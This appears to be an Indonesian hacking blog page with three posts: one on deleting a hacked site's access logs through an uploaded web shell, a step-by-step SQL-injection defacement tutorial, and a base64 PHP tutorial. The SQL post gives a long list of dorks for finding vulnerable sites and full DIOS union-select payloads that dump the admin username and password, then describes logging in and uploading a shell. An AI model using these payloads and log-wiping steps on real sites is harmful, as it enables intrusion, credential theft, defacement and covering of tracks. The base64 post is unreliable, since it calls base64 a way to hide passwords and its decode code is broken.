Flow -  Progress

Menghapus Jejak Pada Website Yang di Deface

 Menghapus Jejak Pada Website Yang di Deface

"Cara Mengahpus Jejak Pada Website Yang di Deface" orang-orang juga jarang memperhatikan ini

Mengapus File Access-Logs

Mungkin terdengar asing di telinga kalian yg biasa mendengar,
Hal ini juga sering di spelekan oleh orang-orang, kenapa ? karena buru-buru mau masukin hasil deface ke mirror, it's true ?. ok langsung simak tutorialnya.
1. Buka Shell hasil deface kalian tadi.
2. Pindah direktori ke direktori root. kaga tau direktori root ?? biasanya itu nama user web nya (liat gambar)

 3. Setelah pindah ke direktori root (klo misalnya kaga muncul daftar direktorinya, berarti permission denied, kaga vuln) pilih direktori access-logs (atau semacamnya)
4. Buka dir tersebut,
5. Akan muncul file, biasanya sih nama domain websitenya.
6. Delete deh,, :) (kalo gagal berarti permission denied, kaga vuln)

Cara Alternatif

Pakai VPN atau Proxy dan semacamnya. biar aman,
pke VPN atau Proxy adalah LEMOT !!
Kecuali ada VPN atau Proxy yg speednya up 50Mbps, WOW !!!
Sekian dulu tutorial kali ini semoga bermanfaat, kalo gak bermanfaat ya manfaatin aja.
Share:

Deface Poc SQL with DIOS

Assalamualaikum wr.wb

Kali ini saya akan memberikan Tutorial cara Deface

POC SQL manual with DIOS. Oke langsung saja simak



[#] Bahan - Bahan
1. Dork ( di kembangin lagi )

inurl:"merchandise/index.php?cat="
inurl:".php?index="
inurl:".php?CID="
inurl:".php?SID="
inurl:".php?term="
inurl:".php?sellerID="
inurl:".php?func="
inurl:".php?idz="
inurl:".php?opt="
inurl:".php?txtMainNavID="
inurl:".php?main="
inurl:".php?mood&cat="
inurl:".php?ResultGridPage="
inurl:".php?machineid="
inurl:".php?p1="
inurl:".php?uid="
inurl:".php?typeid="
inurl:".php?calls="
inurl:".php?pt="
inurl:".php?q="
inurl:".php?prod_cat_main="
inurl:".php?prod_cat="
inurl:".php?gid="
inurl:".php?psid="
inurl:".php?tid="
inurl:".php?brand="
inurl:".php?catld="
inurl:".php?name="
inurl:".php?c_id="
inurl:".php?s_id="
inurl:".php?p_id="
inurl:".php?subtype="
inurl:".php?cateid="
inurl:".php?catepid="
inurl:".php?pttype="
inurl:".php?statusik="
inurl:".php?aid="
inurl:".php?gid="
inurl:".php?bo_table="
inurl:".php?recordID="
inurl:".php?sel="
inurl:".php?nav_id="
inurl:".php?shopGroupId="
inurl:".php?idsc="
inurl:".php?pc1="
inurl:".php?pno="
inurl:".php?elid="
inurl:".php?for="
inurl:".php?pricat="
inurl:".php?parent_id="
inurl:".php?brand_id="
inurl:".php?pcid="
inurl:".php??product_id="


 2.Kuota Yang Cukup(Kalo Kaga Ada

    Ya Pake Wifi)

3. Kesabaran :v

4. Niat

5. Kopi,Rokok(Biar Santuy Eaa Coeg)

6. Dios

// Step by step Defacenya //

1. Dorking Dulu Pake Dork Yang Di  Atas....

2. Pilih Site Target Yang Kira Kira Vuln...
Gw Pake Site
http://www.sitetarget.co.li/news.php?id=1

3. Cek Vuln Atau Nggaknya..
Caranya Tambain ' Di Target..

Contoh::

http://www.sitetarget.co.li/news.php?id=1

Jadinya..

http://www.sitetarget.co.li/news.php?id=1'

Kalo Vuln Ada Perubahan Dari Site Targetnya...
Misal :: (Your SQL Syntax Blablablabla , Blank , Ada Yang Berubah...)

4. Lanjut Ke Order Bynya..

http://www.sitetarget.co.li/news.php?id=1+order+by+1--+-
(TIDAK ERROR)

Kita Cari Errornya:v

http://www.sitetarget.co.li/news.php?id=1+order+by+2--+-
( TIDAK ERROR )
http://www.sitetarget.co.li/news.php?id=1+order+by+3--+-
( TIDAK ERROR )
http://www.sitetarget.co.li/news.php?id=1+order+by+4--+-
( TIDAK ERROR )
http://www.sitetarget.co.li/news.php?id=1+order+by+5--+-
( NAH INI BARU ERROR )

Lanjut Ke Union Select(Karna Kita Kan Dah Tau Tuh Jumlah Kolomnya...)

http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,3,4--+-

Nah... Nongol Nih Angka Cantiknya...
3 , 2

Kita Masukin Diosnya Di angka Cantik Yang Nongol Tadi..

(/*!50000select*/(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(/*!50000select*/(0)from(information_schema.columns)/*!50000where*/(table_schema=database())and(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)

Jadinya Gini...

http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,(/*!50000select*/(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(/*!50000select*/(0)from(information_schema.columns)/*!50000where*/(table_schema=database())and(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x),4--+-

Next..
Kita Dump User Password adminnya
Caranya..

(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(namatabel)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,namakolom,0x203a3a20,namakolom))))x)

Begini Jadinya eaa

http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(admin)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),4--+-

Nah Kan..
Ketemu User Pasword Adminnya :D
Next Cari Admin Loginnya(adlog)
Kalo Ada..
Langsung ae Login Pake User Password Yang Kita Dapet Tadi..
Kadang.. Passwordnya Harus Di Crack Lagi:v(Sandi Yang Berupa Algoritma" MD5,MD4,MD2,SHA1,Base64 dan banyak Lainnya)
Kalo Udah Berhasil Login..
Dan upload Shell kalian jangan lupa kalo mau Tebas Di Backup dulu coek kesian admin nya sama developer nya ya anjim

Sekian Dari Gw Salam heker😎
Share:

Encode dan decode base64 pada programan php


Assalamualaikum wr.wb

 saya akan membahas  tentang Encode dan decode base64 pada programan php.


Base64 adalah tehnik menerjemahkan data biner yang berbentuk ASCII. Base64 ini berguna untuk menyembunyikan data data penting seperti contohnya password agar tidak diketahui oleh orang lain.

Tehnik Encode dan decode base64 ini bertujuan sama seperti md5 yaitu cryptography dan di Pemprograman php ini sudah di sediakan untuk Encode dan decode pada text kita.

Untuk membuat decode dan Encode dengan menggunakan php ini kalian bisa pakai :

  • base64_encode() = berguna untuk meng-Encode text 
  • base64_decode() = berguna untuk meng-decode text atau menerjemahkan hasil dari Encode tersebut 
Untuk penggunaan encode kalian bisa ketik coding di bawah ini :
 <?php
 $code = "aku gans sangat";
echo base64_encode($code);
?>

Dan hasilnya :


Bisa kita lihat di sini hasil dari Encode yang saya buat tadi.

Sedangkan jika kita ingin meng-decode text tersebut kita ketik seperti di bawah ini:
 <?php
$code = "aku gans sangat";
echo base64_encode(base64_decode($code) ;
?>
 Dan untuk hasilnya :


Ok cukup sekian tutorial buat kali ini semoga bermanfaat
Share:

SafeLinku

SafelinkU | Shorten your link and earn money

Popular Posts

Pengunjung

Yang Mengikuti

Translate

Weekly post

Recent Posts

Pages

Thanks All Team Cyber Indonesian